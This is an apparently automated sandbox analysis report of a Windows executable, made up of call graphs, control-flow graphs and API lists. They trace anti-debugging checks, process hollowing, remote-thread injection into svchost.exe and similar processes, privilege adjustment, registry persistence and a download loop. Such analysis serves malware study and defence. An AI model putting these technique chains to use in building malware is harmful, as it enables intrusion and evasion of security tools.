7ff6743d1050 LoadLibraryA GetProcAddress 1150->1330 1152 7ff6743d1b2e 1331 7ff6743d1000 LoadLibraryA GetProcAddress 1152->1331 1154 7ff6743d1b48 1332 7ff6743d1050 LoadLibraryA GetProcAddress 1154->1332 1156 7ff6743d1b62 1333 7ff6743d1050 LoadLibraryA GetProcAddress 1156->1333 1158 7ff6743d1b7c 1334 7ff6743d1050 LoadLibraryA GetProcAddress 1158->1334 1160 7ff6743d1b96 1335 7ff6743d1050 LoadLibraryA GetProcAddress 1160->1335 1162 7ff6743d1bb0 1336 7ff6743d1050 LoadLibraryA GetProcAddress 1162->1336 1164 7ff6743d1bca 1337 7ff6743d1050 LoadLibraryA GetProcAddress 1164->1337 1166 7ff6743d1be4 1338 7ff6743d1050 LoadLibraryA GetProcAddress 1166->1338 1168 7ff6743d1bfe 1339 7ff6743d1000 LoadLibraryA GetProcAddress 1168->1339 1170 7ff6743d1c18 1340 7ff6743d1000 LoadLibraryA GetProcAddress 1170->1340 1172 7ff6743d1c32 1341 7ff6743d1050 LoadLibraryA GetProcAddress 1172->1341 1174 7ff6743d1c4c 1342 7ff6743d1050 LoadLibraryA GetProcAddress 1174->1342 1176 7ff6743d1c66 1343 7ff6743d1050 LoadLibraryA GetProcAddress 1176->1343 1178 7ff6743d1c80 1344 7ff6743d1050 LoadLibraryA GetProcAddress 1178->1344 1180 7ff6743d1c9a 1345 7ff6743d1050 LoadLibraryA GetProcAddress 1180->1345 1182 7ff6743d1cb4 1346 7ff6743d1050 LoadLibraryA GetProcAddress 1182->1346 1184 7ff6743d1cce 1185 7ff6743d321c IsDebuggerPresent 1184->1185 1186 7ff6743d322e GetCurrentProcess CheckRemoteDebuggerPresent 1185->1186 1187 7ff6743d322a 1185->1187 1186->1187 1187->898 1187->899 1189 7ff6743d3481 1188->1189 1190 7ff6743d428a GetTokenInformation 1188->1190 1199 7ff6743d3ce4 GetModuleFileNameW 1189->1199 1347 7ff6743d3b54 VirtualAlloc 1190->1347 1192 7ff6743d42bb GetTokenInformation 1193 7ff6743d42e8 CloseHandle 1192->1193 1195 7ff6743d4302 AdjustTokenPrivileges CloseHandle 1192->1195 1194 7ff6743d3b24 VirtualFree 1193->1194 1196 7ff6743d42fd 1194->1196 1348 7ff6743d3b24 1195->1348 1196->1189 1200 7ff6743d3dd2 wcsncpy 1199->1200 1201 7ff6743d3d0f PathFindFileNameW wcslen 1199->1201 1202 7ff6743d3d49 1200->1202 1201->1202 1202->903 1204 7ff6743d43d0 GetLastError 1203->1204 1205 7ff6743d356d 1203->1205 1204->1205 1206 7ff6743d43dd CloseHandle 1204->1206 1205->934 1205->935 1206->1205 1351 7ff6743d38c4 1207->1351 1209 7ff6743d328c 1354 7ff6743d44b4 CreateFileW 1209->1354 1213 7ff6743d3744 3 API calls 1212->1213 1214 7ff6743d3a9f 1213->1214 1215 7ff6743d38c4 11 API calls 1214->1215 1216 7ff6743d3aa9 GetModuleFileNameW DeleteFileW CopyFileW 1215->1216 1217 7ff6743d3aeb SetFileAttributesW 1216->1217 1218 7ff6743d35a7 1216->1218 1371 7ff6743d39b4 RegOpenKeyExW 1217->1371 1221 7ff6743d33ec GetVersionExW 1218->1221 1222 7ff6743d341d 1221->1222 1222->939 1222->940 1224 7ff6743d38c4 11 API calls 1223->1224 1225 7ff6743d32fd 1224->1225 1374 7ff6743d46e4 CreateFileW 1225->1374 1227 7ff6743d3315 1228 7ff6743d3357 CreateThread 1227->1228 1386 7ff6743d40c4 1227->1386 1228->927 1232->956 1233->958 1234->960 1235->962 1236->964 1237->966 1238->968 1239->970 1240->972 1241->974 1242->976 1243->978 1244->980 1245->982 1246->984 1247->986 1248->988 1249->990 1250->992 1251->994 1252->996 1253->998 1254->1000 1255->1002 1256->1004 1257->1006 1258->1008 1259->1010 1260->1012 1261->1014 1262->1016 1263->1018 1264->1020 1265->1022 1266->1024 1267->1026 1268->1028 1269->1030 1270->1032 1271->1034 1272->1036 1273->1038 1274->1040 1275->1042 1276->1044 1277->1046 1278->1048 1279->1050 1280->1052 1281->1054 1282->1056 1283->1058 1284->1060 1285->1062 1286->1064 1287->1066 1288->1068 1289->1070 1290->1072 1291->1074 1292->1076 1293->1078 1294->1080 1295->1082 1296->1084 1297->1086 1298->1088 1299->1090 1300->1092 1301->1094 1302->1096 1303->1098 1304->1100 1305->1102 1306->1104 1307->1106 1308->1108 1309->1110 1310->1112 1311->1114 1312->1116 1313->1118 1314->1120 1315->1122 1316->1124 1317->1126 1318->1128 1319->1130 1320->1132 1321->1134 1322->1136 1323->1138 1324->1140 1325->1142 1326->1144 1327->1146 1328->1148 1329->1150 1330->1152 1331->1154 1332->1156 1333->1158 1334->1160 1335->1162 1336->1164 1337->1166 1338->1168 1339->1170 1340->1172 1341->1174 1342->1176 1343->1178 1344->1180 1345->1182 1346->1184 1347->1192 1349 7ff6743d3b35 VirtualFree 1348->1349 1350 7ff6743d3b48 1348->1350 1349->1350 1350->1189 1360 7ff6743d3744 GetWindowsDirectoryW 1351->1360 1353 7ff6743d38f3 8 API calls 1353->1209 1355 7ff6743d450a 1354->1355 1356 7ff6743d452b GetLastError 1354->1356 1365 7ff6743d4404 GetFileSize 1355->1365 1358 7ff6743d329f CreateThread Sleep 1356->1358 1358->938 1361 7ff6743d378e 1360->1361 1362 7ff6743d3798 GetVolumeInformationW 1360->1362 1361->1362 1363 7ff6743d3814 1362->1363 1364 7ff6743d387e wsprintfW 1363->1364 1364->1353 1370 7ff6743d3b54 VirtualAlloc 1365->1370 1367 7ff6743d4430 1368 7ff6743d447a CloseHandle 1367->1368 1369 7ff6743d4444 SetFilePointer ReadFile 1367->1369 1368->1358 1369->1368 1370->1367 1372 7ff6743d39f9 RegSetValueExW RegCloseKey 1371->1372 1373 7ff6743d39f5 1371->1373 1372->1373 1373->1218 1375 7ff6743d4745 GetFileSize GetProcessHeap RtlAllocateHeap 1374->1375 1376 7ff6743d473e 1374->1376 1377 7ff6743d478e CloseHandle 1375->1377 1378 7ff6743d47a0 ReadFile 1375->1378 1376->1227 1377->1376 1379 7ff6743d47ef 1378->1379 1380 7ff6743d47c7 GetProcessHeap HeapFree CloseHandle 1378->1380 1381 7ff6743d4808 GetProcessHeap HeapFree CloseHandle 1379->1381 1383 7ff6743d4830 1379->1383 1380->1376 1381->1376 1382 7ff6743d499b GetProcessHeap HeapFree CloseHandle 1382->1376 1383->1382 1384 7ff6743d48eb GetProcessHeap RtlAllocateHeap 1383->1384 1385 7ff6743d4934 1384->1385 1385->1382 1401 7ff6743d4004 CreateToolhelp32Snapshot 1386->1401 1389 7ff6743d40e4 1390 7ff6743d414b GetCurrentProcess OpenProcessToken 1389->1390 1391 7ff6743d41c2 OpenProcess 1390->1391 1392 7ff6743d4168 LookupPrivilegeValueW 1390->1392 1395 7ff6743d41e4 1391->1395 1396 7ff6743d41ee 1391->1396 1393 7ff6743d4190 AdjustTokenPrivileges 1392->1393 1394 7ff6743d41b7 CloseHandle 1392->1394 1393->1394 1394->1391 1398 7ff6743d4244 CloseHandle 1395->1398 1399 7ff6743d424f 1395->1399 1396->1395 1400 7ff6743d4222 WaitForSingleObject 1396->1400 1408 7ff6743d2cb8 1396->1408 1398->1399 1399->1228 1400->1390 1400->1395 1402 7ff6743d403f Process32FirstW 1401->1402 1403 7ff6743d3342 1401->1403 1404 7ff6743d405e wcscmp 1402->1404 1405 7ff6743d4099 CloseHandle 1402->1405 1403->1389 1406 7ff6743d4082 Process32NextW 1404->1406 1407 7ff6743d4075 1404->1407 1405->1403 1406->1404 1406->1405 1407->1405 1409 7ff6743d2d0b 1408->1409 1411 7ff6743d2d4d VirtualAllocEx 1409->1411 1412 7ff6743d2d2b 1409->1412 1416 7ff6743d2a88 1409->1416 1411->1412 1413 7ff6743d2d87 WriteProcessMemory 1411->1413 1412->1396 1413->1412 1414 7ff6743d2dd0 VirtualProtectEx 1413->1414 1414->1412 1415 7ff6743d2e03 CreateRemoteThread 1414->1415 1415->1409 1415->1412 1417 7ff6743d2b01 1416->1417 1418 7ff6743d2c0a StrStrA 1417->1418 1419 7ff6743d2b08 1417->1419 1418->1417 1418->1419 1419->1409 1426 7ff6743d2f9c 1427 7ff6743d38c4 11 API calls 1426->1427 1428 7ff6743d2fdb 1427->1428 1429 7ff6743d46e4 17 API calls 1428->1429 1430 7ff6743d2fff 1429->1430 1431 7ff6743d40c4 5 API calls 1430->1431 1432 7ff6743d3022 1431->1432 1433 7ff6743d40e4 13 API calls 1432->1433 1434 7ff6743d3037 GetProcessHeap HeapFree 1433->1434 1435 7ff6743d1cdc 1436 7ff6743d1d06 InternetOpenW 1435->1436 1437 7ff6743d1d33 Sleep 1436->1437 1438 7ff6743d1d40 InternetOpenUrlW 1436->1438 1437->1436 1439 7ff6743d1d77 InternetOpenUrlW 1438->1439 1440 7ff6743d1dc9 HttpQueryInfoA 1438->1440 1439->1440 1441 7ff6743d1dae InternetCloseHandle Sleep 1439->1441 1442 7ff6743d1e1e 1440->1442 1443 7ff6743d1df8 InternetCloseHandle InternetCloseHandle Sleep 1440->1443 1441->1436 1444 7ff6743d1e85 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1442->1444 1445 7ff6743d1e28 InternetCloseHandle InternetOpenUrlW 1442->1445 1443->1436 1446 7ff6743d1f04 1444->1446 1447 7ff6743d1eea InternetCloseHandle InternetCloseHandle 1444->1447 1445->1444 1448 7ff6743d1e6a InternetCloseHandle Sleep 1445->1448 1450 7ff6743d1f0c InternetReadFile 1446->1450 1451 7ff6743d1f5a InternetCloseHandle InternetCloseHandle 1446->1451 1449 7ff6743d1f83 1447->1449 1448->1436 1450->1446 1450->1451 1451->1449 1452 7ff6743d30dc 1458 7ff6743d30e5 1452->1458 1453 7ff6743d31d1 1456 7ff6743d3c24 RegDeleteKeyW 1456->1458 1457 7ff6743d3e24 9 API calls 1457->1458 1458->1453 1458->1456 1458->1457 1459 7ff6743d39b4 3 API calls 1458->1459 1461 7ff6743d45c4 CreateFileW 1458->1461 1466 7ff6743d3b84 RegOpenKeyExW 1458->1466 1460 7ff6743d31c1 Sleep 1459->1460 1460->1458 1462 7ff6743d461f 1461->1462 1463 7ff6743d465a 1461->1463 1469 7ff6743d4544 SetFilePointer WriteFile SetEndOfFile 1462->1469 1463->1458 1465 7ff6743d463b SetFileAttributesW CloseHandle 1465->1463 1467 7ff6743d3c12 1466->1467 1468 7ff6743d3bd8 RegSetValueExW RegCloseKey 1466->1468 1467->1458 1468->1467 1469->1465 838 7ff6743d338c 841 7ff6743d2048 GetModuleFileNameW 838->841 842 7ff6743d20c9 841->842 848 7ff6743d20c4 841->848 843 7ff6743d211d 842->843 844 7ff6743d2107 842->844 884 7ff6743d1f88 ExpandEnvironmentStringsW 843->884 845 7ff6743d2111 844->845 846 7ff6743d213b 844->846 845->848 886 7ff6743d2008 ExpandEnvironmentStringsW 845->886 885 7ff6743d1fc8 ExpandEnvironmentStringsW 846->885 851 7ff6743d218d CreateProcessW 851->848 853 7ff6743d21e8 CreateFileW 851->853 852 7ff6743d2132 852->848 852->851 853->848 854 7ff6743d222f GetFileSize 853->854 855 7ff6743d224d 854->855 856 7ff6743d2257 CloseHandle 854->856 855->856 857 7ff6743d2267 VirtualAlloc 855->857 856->848 858 7ff6743d22a1 ReadFile 857->858 859 7ff6743d2291 CloseHandle 857->859 860 7ff6743d22ce VirtualFree CloseHandle 858->860 861 7ff6743d22f1 CloseHandle GetThreadContext 858->861 859->848 860->848 862 7ff6743d2341 VirtualFree 861->862 863 7ff6743d2359 ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 861->863 862->848 864 7ff6743d23e0 VirtualFree 863->864 865 7ff6743d23f8 VirtualAllocEx 863->865 864->848 866 7ff6743d2463 VirtualFree 865->866 867 7ff6743d247b WriteProcessMemory 865->867 866->848 868 7ff6743d24b1 VirtualFree 867->868 870 7ff6743d24c9 867->870 868->848 869 7ff6743d24ff WriteProcessMemory 869->870 871 7ff6743d258a VirtualFree 869->871 870->869 876 7ff6743d25a7 870->876 871->848 872 7ff6743d2898 WriteProcessMemory SetThreadContext 874 7ff6743d2933 ResumeThread 872->874 875 7ff6743d291e VirtualFree 872->875 873 7ff6743d2619 RtlCompareMemory 873->876 880 7ff6743d266c 873->880 877 7ff6743d2945 VirtualFree 874->877 878 7ff6743d295a VirtualFree 874->878 875->848 876->872 876->873 877->848 878->848 879 7ff6743d2893 879->872 880->879 881 7ff6743d279c ReadProcessMemory WriteProcessMemory 880->881 882 7ff6743d2871 VirtualFree 881->882 883 7ff6743d2889 881->883 882->848 883->880 884->852 885->852 886->852 887 7ff6743d33ac 888 7ff6743d2048 37 API calls 887->888 889 7ff6743d33bf 888->889 1420 7ff6743d2f0c CreateMutexA 1421 7ff6743d2f4e GetLastError 1420->1421 1422 7ff6743d2f31 ReleaseMutex CloseHandle 1420->1422 1424 7ff6743d2f5b ReleaseMutex CloseHandle 1421->1424 1425 7ff6743d2f78 ReleaseMutex CloseHandle 1421->1425 1423 7ff6743d2f90 1422->1423 1424->1423 1425->1423 1470 7ff6743d31ec 1471 7ff6743d31f5 1470->1471 1472 7ff6743d320e 1471->1472 1475 7ff6743d306c 1471->1475 1480 7ff6743d2e6c CreateMutexA 1475->1480 1478 7ff6743d30cc Sleep 1478->1471 1479 7ff6743d3087 Sleep CreateThread WaitForSingleObject 1479->1478 1481 7ff6743d2eb5 GetLastError 1480->1481 1482 7ff6743d2e98 ReleaseMutex CloseHandle 1480->1482 1484 7ff6743d2ec2 ReleaseMutex CloseHandle 1481->1484 1485 7ff6743d2edf ReleaseMutex CloseHandle 1481->1485 1483 7ff6743d2ef7 1482->1483 1483->1478 1483->1479 1484->1483 1485->1483

                                                                                                                                                                  Callgraph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                  • Disassembly available
                                                                                                                                                                  callgraph 0 Function_00007FF6743D3B84 1 Function_00007FF6743DA27F 2 Function_00007FF6743DF281 3 Function_00007FF6743D327C 21 Function_00007FF6743D44B4 3->21 83 Function_00007FF6743D38C4 3->83 4 Function_00007FF6743DA776 5 Function_00007FF6743D2978 6 Function_00007FF6743DA778 7 Function_00007FF6743DF278 8 Function_00007FF6743DEF92 9 Function_00007FF6743D338C 35 Function_00007FF6743D2048 9->35 10 Function_00007FF6743D1F88 11 Function_00007FF6743D2A88 11->5 12 Function_00007FF6743DA188 13 Function_00007FF6743D43A4 14 Function_00007FF6743D10A0 33 Function_00007FF6743D1050 14->33 58 Function_00007FF6743D1000 14->58 15 Function_00007FF6743DE99B 16 Function_00007FF6743D2F9C 38 Function_00007FF6743D3C64 16->38 16->83 84 Function_00007FF6743D40C4 16->84 95 Function_00007FF6743D46E4 16->95 97 Function_00007FF6743D40E4 16->97 17 Function_00007FF6743D359D 18 Function_00007FF6743DE997 19 Function_00007FF6743DE999 20 Function_00007FF6743D39B4 56 Function_00007FF6743D4404 21->56 22 Function_00007FF6743D33AC 22->35 23 Function_00007FF6743DBEAD 24 Function_00007FF6743D4544 25 Function_00007FF6743D3744 67 Function_00007FF6743D3714 25->67 26 Function_00007FF6743DD33F 27 Function_00007FF6743DD339 28 Function_00007FF6743DA052 29 Function_00007FF6743D3B54 30 Function_00007FF6743DDC55 31 Function_00007FF6743DCD54 32 Function_00007FF6743DA04E 34 Function_00007FF6743DDC46 35->10 71 Function_00007FF6743D2008 35->71 94 Function_00007FF6743D1FC8 35->94 36 Function_00007FF6743DD365 37 Function_00007FF6743DCF65 39 Function_00007FF6743D4264 39->29 75 Function_00007FF6743D3B24 39->75 40 Function_00007FF6743DB15F 41 Function_00007FF6743DA061 42 Function_00007FF6743DD361 43 Function_00007FF6743DA05A 44 Function_00007FF6743D345C 44->3 44->13 44->14 44->39 50 Function_00007FF6743D3A74 44->50 66 Function_00007FF6743D3F14 44->66 79 Function_00007FF6743D321C 44->79 96 Function_00007FF6743D3CE4 44->96 109 Function_00007FF6743D33EC 44->109 110 Function_00007FF6743D32EC 44->110 45 Function_00007FF6743DC65C 46 Function_00007FF6743DDE59 47 Function_00007FF6743DA258 48 Function_00007FF6743DC673 49 Function_00007FF6743DA772 50->20 50->25 50->83 51 Function_00007FF6743D4674 52 Function_00007FF6743DDE70 53 Function_00007FF6743D2E6C 54 Function_00007FF6743D306C 54->53 55 Function_00007FF6743D4004 56->29 57 Function_00007FF6743DD904 59 Function_00007FF6743DC501 60 Function_00007FF6743DABFB 61 Function_00007FF6743D36FC 62 Function_00007FF6743DABF7 63 Function_00007FF6743DC2F7 64 Function_00007FF6743DABF9 65 Function_00007FF6743DC2F9 68 Function_00007FF6743DD615 69 Function_00007FF6743DD915 70 Function_00007FF6743D2F0C 72 Function_00007FF6743D3609 73 Function_00007FF6743DB508 74 Function_00007FF6743DE008 76 Function_00007FF6743D3C24 77 Function_00007FF6743D3E24 78 Function_00007FF6743DC91A 80 Function_00007FF6743DD91D 81 Function_00007FF6743DF232 82 Function_00007FF6743DDCC2 83->25 84->55 85 Function_00007FF6743D45C4 85->24 86 Function_00007FF6743DD0C4 87 Function_00007FF6743DEBBE 88 Function_00007FF6743DDEC1 89 Function_00007FF6743D2CB8 89->11 90 Function_00007FF6743DD8B8 91 Function_00007FF6743DA2D0 92 Function_00007FF6743DC9CB 93 Function_00007FF6743D33CC 93->35 95->51 97->89 98 Function_00007FF6743DB3DA 99 Function_00007FF6743D1CDC 100 Function_00007FF6743D30DC 100->0 100->20 100->76 100->77 100->85 101 Function_00007FF6743DA0DD 102 Function_00007FF6743D36D8 103 Function_00007FF6743DEFD8 104 Function_00007FF6743DE8F3 105 Function_00007FF6743DABF2 106 Function_00007FF6743DC2F5 107 Function_00007FF6743DB2F4 108 Function_00007FF6743DBCF1 110->38 110->83 110->84 110->95 110->97 111 Function_00007FF6743D31EC 111->54 112 Function_00007FF6743D36EC

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 231 7ff6743d2048-7ff6743d20c2 GetModuleFileNameW 232 7ff6743d20c4 231->232 233 7ff6743d20c9-7ff6743d2105 231->233 234 7ff6743d296d-7ff6743d2975 232->234 235 7ff6743d211d-7ff6743d2139 call 7ff6743d1f88 233->235 236 7ff6743d2107-7ff6743d210f 233->236 245 7ff6743d217c-7ff6743d2186 235->245 237 7ff6743d2111-7ff6743d2119 236->237 238 7ff6743d213b-7ff6743d2157 call 7ff6743d1fc8 236->238 240 7ff6743d211b-7ff6743d2177 237->240 241 7ff6743d2159-7ff6743d2175 call 7ff6743d2008 237->241 238->245 240->234 241->245 248 7ff6743d218d-7ff6743d21e1 CreateProcessW 245->248 249 7ff6743d2188 245->249 251 7ff6743d21e3 248->251 252 7ff6743d21e8-7ff6743d2228 CreateFileW 248->252 249->234 251->234 253 7ff6743d222f-7ff6743d224b GetFileSize 252->253 254 7ff6743d222a 252->254 255 7ff6743d224d-7ff6743d2255 253->255 256 7ff6743d2257-7ff6743d2262 CloseHandle 253->256 254->234 255->256 257 7ff6743d2267-7ff6743d228f VirtualAlloc 255->257 256->234 258 7ff6743d22a1-7ff6743d22cc ReadFile 257->258 259 7ff6743d2291-7ff6743d229c CloseHandle 257->259 260 7ff6743d22ce-7ff6743d22ec VirtualFree CloseHandle 258->260 261 7ff6743d22f1-7ff6743d233f CloseHandle GetThreadContext 258->261 259->234 260->234 262 7ff6743d2341-7ff6743d2354 VirtualFree 261->262 263 7ff6743d2359-7ff6743d23de ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 261->263 262->234 264 7ff6743d23e0-7ff6743d23f3 VirtualFree 263->264 265 7ff6743d23f8-7ff6743d2461 VirtualAllocEx 263->265 264->234 266 7ff6743d2463-7ff6743d2476 VirtualFree 265->266 267 7ff6743d247b-7ff6743d24af WriteProcessMemory 265->267 266->234 268 7ff6743d24b1-7ff6743d24c4 VirtualFree 267->268 269 7ff6743d24c9-7ff6743d24d4 267->269 268->234 270 7ff6743d24e6-7ff6743d24f9 269->270 271 7ff6743d24ff-7ff6743d2588 WriteProcessMemory 270->271 272 7ff6743d25a7-7ff6743d25ee 270->272 273 7ff6743d25a2 271->273 274 7ff6743d258a-7ff6743d259d VirtualFree 271->274 275 7ff6743d2600-7ff6743d2613 272->275 273->270 274->234 277 7ff6743d2898-7ff6743d291c WriteProcessMemory SetThreadContext 275->277 278 7ff6743d2619-7ff6743d2668 RtlCompareMemory 275->278 279 7ff6743d2933-7ff6743d2943 ResumeThread 277->279 280 7ff6743d291e-7ff6743d2931 VirtualFree 277->280 281 7ff6743d266a 278->281 282 7ff6743d266c-7ff6743d2695 278->282 284 7ff6743d2945-7ff6743d2958 VirtualFree 279->284 285 7ff6743d295a-7ff6743d2967 VirtualFree 279->285 280->234 281->275 286 7ff6743d26a0-7ff6743d26ae 282->286 284->234 285->234 287 7ff6743d2893 286->287 288 7ff6743d26b4-7ff6743d273f 286->288 287->277 289 7ff6743d2751-7ff6743d275f 288->289 290 7ff6743d2765-7ff6743d2798 289->290 291 7ff6743d288e 289->291 292 7ff6743d279a 290->292 293 7ff6743d279c-7ff6743d286f ReadProcessMemory WriteProcessMemory 290->293 291->286 292->289 295 7ff6743d2871-7ff6743d2884 VirtualFree 293->295 296 7ff6743d2889 293->296 295->234 296->291
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                  • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                  • API String ID: 514040917-3001742581
                                                                                                                                                                  • Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                  • Instruction ID: fa44ed09526f3543d9b1a67eb9914dff32f547d9e6079499d98b5dbdd5633cb8
                                                                                                                                                                  • Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                  • Instruction Fuzzy Hash: 1E32C53262CAC1C6E774CB16E8987AAA3A1FBC9B95F504135DA9D83B58DF3CD5448F00

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 297 7ff6743d345c-7ff6743d3472 call 7ff6743d10a0 call 7ff6743d321c 302 7ff6743d3474-7ff6743d3476 ExitProcess 297->302 303 7ff6743d347c-7ff6743d34aa call 7ff6743d4264 call 7ff6743d3ce4 call 7ff6743d3f14 297->303 310 7ff6743d34fb-7ff6743d350e call 7ff6743d3f14 303->310 311 7ff6743d34ac-7ff6743d34bd call 7ff6743d43a4 303->311 318 7ff6743d3510-7ff6743d3521 call 7ff6743d43a4 310->318 319 7ff6743d354c-7ff6743d355f call 7ff6743d3f14 310->319 316 7ff6743d34d2-7ff6743d34d4 ExitProcess 311->316 317 7ff6743d34bf-7ff6743d34d0 call 7ff6743d43a4 311->317 317->316 328 7ff6743d34da call 7ff6743d32ec 317->328 326 7ff6743d3523-7ff6743d3525 ExitProcess 318->326 327 7ff6743d352b call 7ff6743d327c 318->327 329 7ff6743d35a2-7ff6743d35b8 call 7ff6743d3a74 call 7ff6743d33ec 319->329 330 7ff6743d3561-7ff6743d3572 call 7ff6743d43a4 319->330 335 7ff6743d3530-7ff6743d3535 327->335 337 7ff6743d34df-7ff6743d34e4 328->337 349 7ff6743d360e-7ff6743d36d0 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 329->349 350 7ff6743d35ba-7ff6743d35cb call 7ff6743d43a4 329->350 344 7ff6743d3574-7ff6743d3576 ExitProcess 330->344 345 7ff6743d357c call 7ff6743d327c 330->345 339 7ff6743d3544-7ff6743d3546 ExitProcess 335->339 340 7ff6743d3537-7ff6743d3542 Sleep 335->340 342 7ff6743d34f3-7ff6743d34f5 ExitProcess 337->342 343 7ff6743d34e6-7ff6743d34f1 Sleep 337->343 340->335 343->337 348 7ff6743d3581-7ff6743d3586 345->348 351 7ff6743d3595-7ff6743d3597 ExitProcess 348->351 352 7ff6743d3588-7ff6743d3593 Sleep 348->352 355 7ff6743d35e0-7ff6743d35e2 ExitProcess 350->355 356 7ff6743d35cd-7ff6743d35de call 7ff6743d43a4 350->356 352->348 356->355 359 7ff6743d35e8 call 7ff6743d32ec 356->359 361 7ff6743d35ed-7ff6743d35f2 359->361 362 7ff6743d35f4-7ff6743d35ff Sleep 361->362 363 7ff6743d3601-7ff6743d3603 ExitProcess 361->363 362->361
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                  • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                  • API String ID: 613740775-1953711635
                                                                                                                                                                  • Opcode ID: 7a5e32be024098133c8fe6dcfe016820a41a9c533a74987b5c75148df4034c8c
                                                                                                                                                                  • Instruction ID: b72a185865ee9549bb7df6e53b394f1c79ed124ad55c31b52d3c67646bf938a3
                                                                                                                                                                  • Opcode Fuzzy Hash: 7a5e32be024098133c8fe6dcfe016820a41a9c533a74987b5c75148df4034c8c
                                                                                                                                                                  • Instruction Fuzzy Hash: 86610E22A2CA53D2FB64AB77E8DD27D6261BF84721F700135E45EC61E5DF2DE8098E10

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 434396405-0
                                                                                                                                                                  • Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                  • Instruction ID: 2e5e60e654f2aeb958fb795d2baff0e94fedc1fb0f12dc13c3c3276502bc7401
                                                                                                                                                                  • Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                  • Instruction Fuzzy Hash: 9931E43262CA81C6E750CB16E49862EB7A0FBD47A1F605135FA8E83B68DF7CD4558F00

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF6743D3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6743D3784
                                                                                                                                                                    • Part of subcall function 00007FF6743D3744: GetVolumeInformationW.KERNELBASE ref: 00007FF6743D3801
                                                                                                                                                                    • Part of subcall function 00007FF6743D3744: wsprintfW.USER32 ref: 00007FF6743D38A2
